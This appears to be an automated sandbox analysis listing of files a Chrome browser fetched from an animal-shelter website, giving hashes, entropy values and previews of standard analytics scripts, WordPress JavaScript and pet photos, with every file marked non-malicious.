                                                                                                                                                                                                                                                        URL:https://indyhumane.org/wp-includes/js/wp-emoji-release.min.js?ver=6.7.1
                                                                                                                                                                                                                                                        Preview:/*! This file is auto-generated */.// Source: wp-includes/js/twemoji.min.js.var twemoji=function(){"use strict";var h={base:"https://cdn.jsdelivr.net/gh/jdecked/twemoji@15.0.3/assets/",ext:".png",size:"72x72",className:"emoji",convert:{fromCodePoint:function(d){d="string"==typeof d?parseInt(d,16):d;if(d<65536)return e(d);return e(55296+((d-=65536)>>10),56320+(1023&d))},toCodePoint:o},onerror:function(){this.parentNode&&this.parentNode.replaceChild(x(this.alt,!1),this)},parse:function(d,u){u&&"function"!=typeof u||(u={callback:u});return h.doNotParse=u.doNotParse,("string"==typeof d?function(d,a){return n(d,function(d){var u,f,c=d,e=N(d),b=a.callback(e,a);if(e&&b){for(f in c="<img ".concat('class="',a.className,'" ','draggable="false" ','alt="',d,'"',' src="',b,'"'),u=a.attributes(d,e))u.hasOwnProperty(f)&&0!==f.indexOf("on")&&-1===c.indexOf(" "+f+"=")&&(c=c.concat(" ",f,'="',u[f].replace(t,r),'"'));c=c.concat("/>")}return c})}:function(d,u){var f,c,e,b,a,t,r,n,o,s,i,l=function d(u,f){v
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):9141
                                                                                                                                                                                                                                                        Entropy (8bit):5.2975271144294185
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:s6zoFrnW4iaX3LzDk1jpJLB2hlq717+3uClD2tFtJ7bykd+SHS+F:s6Udn3LzoJphH8uClD2tFtJ7byTwtF
                                                                                                                                                                                                                                                        MD5:A8127C1A87BB4F99EDBEEC7C37311DCD
                                                                                                                                                                                                                                                        SHA1:9997A1745F48BDD233DBE9BD8164DAA53EBA105B
                                                                                                                                                                                                                                                        SHA-256:F313D12EA6124BD28FC4A6B7163D253BB83D5AEAB5EDCE594880C5C3DF475CBC
                                                                                                                                                                                                                                                        SHA-512:AA10DDC5B29905C60A058FAED3F5F195F7577CEAC46489E02461B5135732194DAA3AEF4AA473127BF8C753312E02074CFDAC8D0F8F0CC8AA544C7F8E02BEBD08
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:/*! This file is auto-generated */.(()=>{var t={2058:(t,e,r)=>{var n;!function(){"use strict";var i={not_string:/[^s]/,not_bool:/[^t]/,not_type:/[^T]/,not_primitive:/[^v]/,number:/[diefg]/,numeric_arg:/[bcdiefguxX]/,json:/[j]/,not_json:/[^j]/,text:/^[^\x25]+/,modulo:/^\x25{2}/,placeholder:/^\x25(?:([1-9]\d*)\$|\(([^)]+)\))?(\+)?(0|'[^$])?(-)?(\d+)?(?:\.(\d+))?([b-gijostTuvxX])/,key:/^([a-z_][a-z_\d]*)/i,key_access:/^\.([a-z_][a-z_\d]*)/i,index_access:/^\[(\d+)\]/,sign:/^[+-]/};function a(t){return function(t,e){var r,n,o,s,l,u,p,c,f,d=1,h=t.length,g="";for(n=0;n<h;n++)if("string"==typeof t[n])g+=t[n];else if("object"==typeof t[n]){if((s=t[n]).keys)for(r=e[d],o=0;o<s.keys.length;o++){if(null==r)throw new Error(a('[sprintf] Cannot access property "%s" of undefined value "%s"',s.keys[o],s.keys[o-1]));r=r[s.keys[o]]}else r=s.param_no?e[s.param_no]:e[d++];if(i.not_type.test(s.type)&&i.not_primitive.test(s.type)&&r instanceof Function&&(r=r()),i.numeric_arg.test(s.type)&&"number"!=typeof r&&
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=13, orientation=upper-left, resolutionunit=2, manufacturer=Google, model=Pixel 5, xresolution=185, yresolution=193, software=HDR+ 1.0.604778939zd, datetime=2024:06:20 21:17:18, xresolution=242, yresolution=250, GPS-Data], baseline, precision 8, 420x420, components 3
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):46602
                                                                                                                                                                                                                                                        Entropy (8bit):7.916456485630772
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:HSjpLgYyokHPrQ24s6n3VM82uhDG9GP7H5oxh7xTmkPzP1ou1iRiIUt3TbPUU7b2:yjyMkUxn3VM8acP7K7xTmg5rVtHc+bs3
                                                                                                                                                                                                                                                        MD5:A5B82CADCA61ED6517DB5AC3970D87A8
                                                                                                                                                                                                                                                        SHA1:0023CD20F664190BF3B00F91C659FCFFDEE28371
                                                                                                                                                                                                                                                        SHA-256:0CBC093B30706BC775D6CD81E8C690DC643F5E8A0302427A4D9E2DD089AFDB7C
                                                                                                                                                                                                                                                        SHA-512:3C89B7FFB2A7672D85E7FBC63FB3C3A621A71FD50CB273C010D209124080330151E0CA5725B95D18CE955C34BF548C274A7076F219C625CB030DF0EB2887C3B9
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:......JFIF.....H.H......Exif..II*...................(.......................................................................1...........2...................................i...........%...............Google.Pixel 5.H.......H.......HDR+ 1.0.604778939zd.2024:06:20 21:17:18.H.......H.......)."...........'.......N...........0232............................................816.........816.........816.........0100........w...........t...........................................................................................................................................................................3...........4..."...............2...........:...........B...........V...........j...........r...........z............................................................... ...!...........-04:00.-04:00.-04:00.Google.Pixel 5 back camera 4.38mm f/1.73....@B......d...2024:06:20 21:17:18.2024:06:20 21:17:18.....d.......d.......d...............d...........................f1db890eddbeb50f0000000000000000
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=14, orientation=upper-left, resolutionunit=2, manufacturer=Apple, model=iPhone 12, xresolution=198, yresolution=206, software=17.4.1, datetime=2024:06:05 14:56:07, hostcomputer=iPhone 12, xresolution=251, yresolution=259, GPS-Data], baseline, precision 8, 315x420, components 3
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):47408
                                                                                                                                                                                                                                                        Entropy (8bit):7.883642791795805
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:Tv9kdHdxavEqjGSNc51AdsZUO1NzdqSFmt99SO1yY/9LFqIYYUWUfLoMcWVJ054O:JkdHdxKjjldLO1NzdqkmLhywVYYfUFcX
                                                                                                                                                                                                                                                        MD5:4F1D27ACABE284CAFDCA64691C210CF3
                                                                                                                                                                                                                                                        SHA1:1A1EA7F0757D8EC28D652C63142D541AAD6E0DC3
                                                                                                                                                                                                                                                        SHA-256:5646C5506A21CDBAEF4BEFEB27347EF20C1B6269DF31A9667D8702BEC7F48D8D
                                                                                                                                                                                                                                                        SHA-512:07175ED19CDB101B53E3B259466299C16B224278C9B58A641B7BDF06E984829F10D95CDFDC32EC04220A9AFCC6086DAC0D0858AD68761E3B0D9517ADC1FF063E
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://g.petango.com/photos/352/9f9246f1-3d7b-48bd-a446-e54427acddec.jpg
                                                                                                                                                                                                                                                        Preview:......JFIF.....H.H......Exif..II*...................(.......................................................................1...........2...........<...................................i...........%...............Apple.iPhone 12.H.......H.......17.4.1.2024:06:05 14:56:07.iPhone 12.H.......H......."."...........'.......@...........0232............................................675.........675.........0100....................................................................................................................................2...........3...........4...,....................................... ...........4...........H...........P...........X...........`...........h...........p...|...Y...x.......-04:00.-04:00.-04:00.................................Apple.iPhone 12 back dual wide camera 4.2mm f/1.6.....<...........2024:06:05 14:56:07.2024:06:05 14:56:07......(..o8...)...J..K<........................q.Apple iOS...MM.-.......................0.......h...0..............................
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (4161), with no line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):4161
                                                                                                                                                                                                                                                        Entropy (8bit):5.113318664604583
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:96:egbkJsYXW7DU2U6Gq7cDrLsbaO+RLTapcRbSmJAGzjpN2xmiejNcnRsJ7pX:egbCFXMDU2U60/LsbabLTaalAGzjpcxW
                                                                                                                                                                                                                                                        MD5:4976D90C77527CD79D54B58B049F68B5
                                                                                                                                                                                                                                                        SHA1:84A2C5A9113286FA7673D581848F39EF658E4C18
                                                                                                                                                                                                                                                        SHA-256:B63795D4538A869657B6F3BB5CB2A5298FD3A9303FC29AB4D054E5ED63404F07
                                                                                                                                                                                                                                                        SHA-512:53F9314CAD0EBE058B0412552C0442C08C21DA4E2660F231ACB56E50B7C05171ECAC670D833D051D01CB4C6112AF4FC2A52A919E764E87C0BB656C544291F041
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:(()=>{var t={94185:t=>{void 0===TCB_Front.js_modules.carousel&&TCB_Front.setModuleLoadedStatus("carousel",!1),function(s,e){if(TCB_Front.isModuleLoaded("carousel"))return;const i={tablet:1023,mobile:767};class o{constructor(t){this.carousel=t,this.$carousel=t.$element,this.isEditor=t.isEditor,this.isEditor||this.bindFrontEvents()}static get elementsWithLinks(){return TCB_Front.Hooks.applyFilters("tve.carousel.element_with_links",".tcb-col[data-href],.thrv-content-box[data-href]")}static get carouselContainerSelector(){return".tcb-image-gallery-container, .tcb-carousel-container"}static get carouselSelector(){return'[data-type="carousel"]'}static getResponsiveSetting(t,s,e){const o=JSON.parse(JSON.stringify(t.responsive))["tablet"===e?0:1];let a;return a="desktop"!==e&&o&&o.breakpoint===i[e]&&void 0!==o.settings[s]?o.settings[s]:t[s],a}static setDots(t,s){const e=t.parents('.tcb-image-gallery,[data-type="carousel"]');s&&(t.length&&0===e.find(" > ul.tcb-carousel-dots").length&&e.append(t
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (7155)
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):322901
                                                                                                                                                                                                                                                        Entropy (8bit):5.571608544759081
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3072:sK2+EG+3bw/YHzpSrl03rQ1A5yCOA7LcGB84x94czxKonhsGH3voElwH:sy+3bsYH1KSVUCTv4QKonhsGHg/
                                                                                                                                                                                                                                                        MD5:6DFAD8C0F80B8FF839F1C3498B000098
                                                                                                                                                                                                                                                        SHA1:FC340215BE898F305D4E9A91505AD1F5909943D8
                                                                                                                                                                                                                                                        SHA-256:08A3964FEC5000E4A22BC02DF0BF8F6BE6149535033EDEB0B2513A18635F957B
                                                                                                                                                                                                                                                        SHA-512:36777AFADE6904654C31F4BC8A3659EF5675C8C4481F092659BDBC0E5283070D6630A650B6D765B8E7A71345D61E1473FFAE58870FB5C15AA3656948C61D6E32
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://www.googletagmanager.com/gtm.js?id=GTM-M2BHRHR
                                                                                                                                                                                                                                                        Preview:.// Copyright 2012 Google Inc. All rights reserved.. . (function(w,g){w[g]=w[g]||{};. w[g].e=function(s){return eval(s);};})(window,'google_tag_manager');. .(function(){..var data = {."resource": {. "version":"33",. . "macros":[{"function":"__u","vtp_component":"URL","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__e"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"ecommerce.value"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"ecommerce.transaction_id"},{"function":"__u","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__v","vtp_name":"gtm.elementId","vtp_dataLayerVersion":1},{"function":"__v","vtp_name":"gtm.triggers","vtp_dataLayerVersion":2,"vtp_setDefaultValue":true,"vtp_defaultValue":""},{"function":"__v","vtp_name":"gtm.elementUrl","vtp_dataLayerVersion":1},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (16664)
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):16665
                                                                                                                                                                                                                                                        Entropy (8bit):5.3013551207488465
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:GU1k0NwY44Xg68CU2dS8kcygRQOeukl0banlxyC0SXIHGGuGqY+AAUgdgKTGvcoZ:FkNx6VCFAG1GbjjD1AoYy6He/yq/9d
                                                                                                                                                                                                                                                        MD5:C22322B3D030360971584A98C60B6E0B
                                                                                                                                                                                                                                                        SHA1:A294CFD56F36A6C83A2A7B87BCC8B226BE977E50
                                                                                                                                                                                                                                                        SHA-256:3F6004A6C9021E04EC32CA88DF8F9A5785E53DA23511F1BF0D56DEFC1B9759F8
                                                                                                                                                                                                                                                        SHA-512:1C75119306313478B676A076B169F24B504C69BEC8529FBAAAE95298FF29D9CE69CD4B7F3461EE674335C4D776BD8294E9BCCEB03CCD9EDFB2618CD74C0C62FA
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:var COMSCORE=function(n){var t=function(){return t=Object.assign||function(n){for(var t,e=1,r=arguments.length;e<r;e++)for(var i in t=arguments[e])Object.prototype.hasOwnProperty.call(t,i)&&(n[i]=t[i]);return n},t.apply(this,arguments)};"function"==typeof SuppressedError&&SuppressedError;var e=["co.uk","com.br","com.ar","com.tw","com.mx","co.jp","com.au","com.my","gob.mx","co.id","com.hk","mus.br","com.co","com.sg","com.tr","co.in","net.tw","com.pe","com.ve","co.es"];function r(n,t,e){-1==n.indexOf("?")&&(n+="?");var r=!1;(-1!=n.indexOf("&")||n.length-1>n.indexOf("?"))&&(r=!0);for(var i=0;i<t.length;++i){var o=t[i];for(var u in o)r&&(n+="&"),r=!0,n+=u+"="+c(o[u]+"")}return n=function(n,t){if(n.length>t){var e=n.substring(0,t-8).lastIndexOf("&");n=(n=n.substring(0,e)+"&ns_cut="+c(n.substring(e+1))).substring(0,t)}return n}(n,e),n}function i(n,t){for(var e in t){var r=t[e];r!=undefined&&(n[e]=r)}}var c="undefined"!=typeof encodeURIComponent?encodeURIComponent:escape,o="undefined"!=typeof
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines (64265)
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):435350
                                                                                                                                                                                                                                                        Entropy (8bit):5.476473868095639
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6144:R1NZzFkTWbt8bMcX4j+ndcJoJYJNLtNp8mt4btxstPMsDcdMGT+TWLoOt49vJ+eB:HcMcX4j+ndlXQe3Q9xcWr
                                                                                                                                                                                                                                                        MD5:EB461B1207BBA205AB5E8407E32DA5B9
                                                                                                                                                                                                                                                        SHA1:EBD8040F55A9C4DE062298A8F114CDFE9429B4A3
                                                                                                                                                                                                                                                        SHA-256:5FC25510444A6DAEDF5D753BA44A571D30F4537D4943234CF04AD0C9E67F9AAC
                                                                                                                                                                                                                                                        SHA-512:C0B96B8BEFDE797FCFECC1D3F9FC9C111198C3513F198EE18E2D84F816C8CC55B3EE8790FCCDFDE523320B8AFC6AF038A0D4E037DCC1D3A4FD50CE66FC1A77FA
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://indyhumane.org/
                                                                                                                                                                                                                                                        Preview:<!DOCTYPE html>. [if IE 7]>.<html class="ie ie7" lang="en-US">.<![endif]-->. [if IE 8]>.<html class="ie ie8" lang="en-US">.<![endif]-->. [if !(IE 7) | !(IE 8) ]> >.<html lang="en-US"class="tcb">. <![endif]-->.<head>...<meta charset="UTF-8"/>.........<meta name="viewport" content="width=device-width, initial-scale=1.0"/>...<style type="text/css" id="tcb-style-base-page-8385" onLoad="typeof window.lightspeedOptimizeStylesheet === 'function' && window.lightspeedOptimizeStylesheet()" class="tcb-lightspeed-style">.tve_lead_generated_inputs_container .tve-lg-dropdown-message-after{background-color: rgba(60,190,199,0.5);padding: 4px 6px;font-weight: 400;font-size: 12px;color: rgba(0,0,0,0.5);display: block;}.thrv_lead_generation_container .tve_lg_number{flex-wrap: wrap;}.thrv_lead_generation_container .tve_lg_number input{flex: 1 1 0%;max-width: 100%;}.thrv_lead_generation_container .tve_lg_number .thrv_field_wrapper{position: relative;display: flex;flex: 0 0 100%;}.thrv_lead
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=10, resolutionunit=2, manufacturer=Canon, model=Canon EOS R5, xresolution=153, yresolution=161, software=Adobe Photoshop Lightroom Classic 14.0.1 (Macintosh), datetime=2024:12:09 14:55:30, xresolution=242, yresolution=250], baseline, precision 8, 420x630, components 3
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):72284
                                                                                                                                                                                                                                                        Entropy (8bit):7.95998731203523
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:M3I7jNbUZNfXbwn2NqF8V7sScjbWmQnAoDPsLWvKPYG:M3Ih2VXbw2NqF8ADbWmQnAoDPZvWt
                                                                                                                                                                                                                                                        MD5:6B61E4FEF605A59436A217248E15D6CF
                                                                                                                                                                                                                                                        SHA1:25933848C527C31E0329DB161ACF080E35BE9735
                                                                                                                                                                                                                                                        SHA-256:1A13B91C6E932538E61EBFE0BD4573007BE4A112D20C06E3A48DBF75FCCFAAFC
                                                                                                                                                                                                                                                        SHA-512:7C8712772B2C95E94A0929BAD223FA0E1EABD8BEE804BDB89DA47B11E646ECDE5C27C51BAD90CB2128B39960FFFEB4DA22E522A318E892ADE9D25F45D59E752C
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://g.petango.com/photos/352/fdac7120-64a7-4244-8d9a-cd8706ac5427.jpg
                                                                                                                                                                                                                                                        Preview:......JFIF.....,.,.....hExif..II*.......(...........................................................1...5.......2...................................i...............Canon.Canon EOS R5.,.......,.......Adobe Photoshop Lightroom Classic 14.0.1 (Macintosh).2024:12:09 14:55:30.H.......H....... .0...........2..........."...........'...................0231................................95..........95..................................................................................................1...........2...........4...........5...................................................................(...........0...........8...........@...........H...........P...........X.......-05:00.-05:00.-05:00.122025001163.........i.......................RF24-105mm F2.8 L IS USM Z.4020001296.................2024:12:09 08:14:28.2024:12:09 08:14:28..t.@B...T-.@B..................U.........}......_S........XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ....
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2343)
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):52916
                                                                                                                                                                                                                                                        Entropy (8bit):5.51283890397623
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:oHzaMKHBCwsZtisP5XqYofL+qviHOlTjdNoVJDe6VyKaqgYUD0ZTTE8yVfZsk:caMKH125hYiM8O9dNoVJ3N48yVL
                                                                                                                                                                                                                                                        MD5:575B5480531DA4D14E7453E2016FE0BC
                                                                                                                                                                                                                                                        SHA1:E5C5F3134FE29E60B591C87EA85951F0AEA36EE1
                                                                                                                                                                                                                                                        SHA-256:DE36E50194320A7D3EF1ACE9BD34A875A8BD458B253C061979DD628E9BF49AFD
                                                                                                                                                                                                                                                        SHA-512:174E48F4FB2A7E7A0BE1E16564F9ED2D0BBCC8B4AF18CB89AD49CF42B1C3894C8F8E29CE673BC5D9BC8552F88D1D47294EE0E216402566A3F446F04ACA24857A
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://www.google-analytics.com/analytics.js
                                                                                                                                                                                                                                                        Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var n=this||self,p=function(a,b){a=a.split(".");var c=n;a[0]in c||"undefined"==typeof c.execScript||c.execScript("var "+a[0]);for(var d;a.length&&(d=a.shift());)a.length||void 0===b?c=c[d]&&c[d]!==Object.prototype[d]?c[d]:c[d]={}:c[d]=b};function q(){for(var a=r,b={},c=0;c<a.length;++c)b[a[c]]=c;return b}function u(){var a="ABCDEFGHIJKLMNOPQRSTUVWXYZ";a+=a.toLowerCase()+"0123456789-_";return a+"."}var r,v;.function aa(a){function b(k){for(;d<a.length;){var m=a.charAt(d++),l=v[m];if(null!=l)return l;if(!/^[\s\xa0]*$/.test(m))throw Error("Unknown base64 encoding at char: "+m);}return k}r=r||u();v=v||q();for(var c="",d=0;;){var e=b(-1),f=b(0),h=b(64),g=b(64);if(64===g&&-1===e)return c;c+=String.fromCharCode(e<<2|f>>4);64!=h&&(c+=String.fromCharCode(f<<4&240|h>>2),64!=g&&(c+=String.fromCharCode(h<<6&192|g)))}};var w={},y=function(a){w.TAGGING=w.TAGGING||[];w.TAGGING[a]=!0};var ba=Array.isArray,c
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=16, height=3500, PhotometricIntepretation=RGB, orientation=upper-left, width=2334], baseline, precision 8, 420x630, components 3
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):59308
                                                                                                                                                                                                                                                        Entropy (8bit):7.928679626831452
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:X3QddMfjNMUepBbcrhjEX4X9BRfO8RFGP:X3Qrce3bKNPs8RF4
                                                                                                                                                                                                                                                        MD5:38C499CB35B6C9A9ABFA287712ABCA47
                                                                                                                                                                                                                                                        SHA1:CF54D7B52B49AABF5718C6C60755F7265DB0307B
                                                                                                                                                                                                                                                        SHA-256:23AAF858470BFA20483C65ED2030EC7B6045A52D049DC301D42F031AFC5F6455
                                                                                                                                                                                                                                                        SHA-512:75B5AB96961B8D75E92A9063A63E87CAC8E45D15F85CF6130D342F4CA729EA2883E939802782A9D01EE4184304327FA1A15AB536E111093B75F5ED339CB98E2A
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:......JFIF.....,.,......Exif..II*...................................................................(.......................................................................1...".......2...................-...........5...i.......=.............Canon.Canon EOS R5.,.......,.......Adobe Photoshop 25.11 (Macintosh).2024:12:09 15:05:42.H.......H.......".0...........2..........."...........'...................0231................................43..........43..........................................................................................................................1...........2...........4...........5.......8...........C...........K...........S...........g...........{...............................................................................-05:00.-05:00.-05:00.122025001163.........i.......................RF24-105mm F2.8 L IS USM Z.4020001296.........#.......2024:12:09 07:46:55.2024:12:09 07:46:55....@B..........................3.........}......_S........XICC_PROFILE......HL
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=16, height=3500, PhotometricIntepretation=RGB, orientation=upper-left, width=2334], baseline, precision 8, 420x630, components 3
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):88211
                                                                                                                                                                                                                                                        Entropy (8bit):7.961251077707535
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:b3OdiXKlobPyNO41hd7HY+Kvs4KUP8PWGuYa9cbWvjaxmFqVgAN5E:b3OUXKTN/nY+KkYWzDbWvjpYHE
                                                                                                                                                                                                                                                        MD5:C5A5F26FE99EE5CDBB2BBE4F9CADB44D
                                                                                                                                                                                                                                                        SHA1:2A97F22C17CD4426304ECB31902D9DA3B99D8459
                                                                                                                                                                                                                                                        SHA-256:63755BE8F4918A8499439C7E387426F6D2D674F58A6791A5612E7162D8FD8090
                                                                                                                                                                                                                                                        SHA-512:F37CBE1CAFC784569E4E069811E40B92694C06169DB003E4EA50477EC9413A370DA1FDD061BF140854D8AB03A9B1E8FD511F20C72FBC47E8012C031D4EA44009
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:......JFIF.....,.,......Exif..II*...................................................................(.......................................................................1...".......2...................-...........5...i.......=.............Canon.Canon EOS R5.,.......,.......Adobe Photoshop 25.11 (Macintosh).2024:12:09 15:07:44.H.......H.......".0...........2..........."...........'...................0231................................65..........65..........................................................................................................................1...........2...........4...........5.......8...........C...........K...........S...........g...........{...............................................................................-05:00.-05:00.-05:00.122025001163.........i.......................RF24-105mm F2.8 L IS USM Z.4020001296.....@...#.......2024:12:09 07:41:03.2024:12:09 07:41:03...~.@B..........................I.........}......_S........XICC_PROFILE......HL
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (9284)
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):245020
                                                                                                                                                                                                                                                        Entropy (8bit):5.453937864649824
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3072:6FLeYH8W1WJ/37Oec8NteqZEbkxZNsucrl0xYurPK7d3OCX:6FLeYcgWJzm8NNfFcrHurPK7d3/X
                                                                                                                                                                                                                                                        MD5:645219BB69D1C9F06CC935CC54DC1C2A
                                                                                                                                                                                                                                                        SHA1:F14ACE0F9745356BC77D888857EF32A5EADC8615
                                                                                                                                                                                                                                                        SHA-256:5332FD32D8BE28EB2531721220E8C3C561000378988BE4B4D7F97568F0B3F224
                                                                                                                                                                                                                                                        SHA-512:CB41C3768945DA663B54A29758D6BDFFFD4666C6EEEB253017748831CB424CB54113CFE9DF06959E980E0A7B9EACB6F0D9DD1016B3A9B1BC900FAB79A30AF837
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (4909), with no line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):4909
                                                                                                                                                                                                                                                        Entropy (8bit):4.9560854515639745
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:96:QqxnA9oqtdTnTrCtOuHkae21oY/kbVQ/VmXVWxllBpBBpWbh8cM3bY+DYEYFsI:QqZWN/TnTCeyoY/kxWmlCxh8Wcp+cEKJ
                                                                                                                                                                                                                                                        MD5:5903AF029674C076453CC048C5545BED
                                                                                                                                                                                                                                                        SHA1:C3D48ED621531AFA5011B8E2A5754E45E7B1E9E2
                                                                                                                                                                                                                                                        SHA-256:B2CFA8C07E56391BC35B0A0243A343FC8B8B63A54BEB98C3831F9C84CDCB67C5
                                                                                                                                                                                                                                                        SHA-512:767B8ECA54052D08B1CB5248F0D24D471B21CB9A17B0F9E184B1BFBFD593B5614423DA472859DFA94E20EC82A02116FFA4D81E6650F74D508AFCD3B65519A9BD
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
